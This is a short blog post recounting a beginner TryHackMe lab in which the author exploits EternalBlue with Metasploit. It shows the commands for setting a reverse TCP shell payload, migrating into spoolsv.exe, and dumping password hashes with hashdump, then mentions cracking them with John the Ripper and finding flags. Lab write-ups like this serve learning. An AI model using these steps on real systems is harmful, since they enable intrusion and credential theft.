top of page

Try Hackme \ Exploiting Eternal Blue


Today is wind-down Friday with minimal studies planned for today and this weekend, so I thought I should get back in Tryhackme and look at some basic Windows vulnerabilities.

Ive had a on-off relationship with Tryhackme, but today I am going to stick with it and see how far I get.


20 minutes in and BOOOOOM we have exploited our Windows machine with the eternal blue exploit.


Tell me this isn't a beautiful sight ! I am at the Windows command prompt having set the payload in Metasploit to:


set payload windows/x64/shell/reverse_tcp


Once I upgraded my session i can see I am NT AUTHORITY


Ok let's now migrate to spoolsv.exe on PID 2028


migrate 2028


I am now living in the printer process !


Next we use hashdump in meterpreter to dump the Windows account password hashes


Right let's see if we can crack this users password. I opened a new terminal window and created a new file:


touch jon.hash


Then I opened the file with nano and pasted in the hash from the previous terminal:


cat john.hash


I saved the nano file with CTRL+o


Next I ran this command in the terminal to try and crack the password using JohntheRipper


The last thing to do on this vulnerable machine is to find the flags that have been dotted around Windows. Jumping back to the meterpreter terminal window we can check where we are:


pwd


and move to the root of the C drive with:


cd ..

cd..


pwd


ls


I found flag 1 in the root of the C drive.


Flag 2 was found in :


Windows\System32\Config


And flag 3 in:


Users\John\Documents


Each of the flags can be read with:


cat flag1.txt (as an example)

Making sure you are in the correct directory obviously !


Conclusion

One of the beginner rooms on Tryhackme but a good place to start and I found it fun. You know when you're a total geek when you actually shout out "YES" when you see the Windows command prompt for the first time like I did !!!!




0 views
bottom of page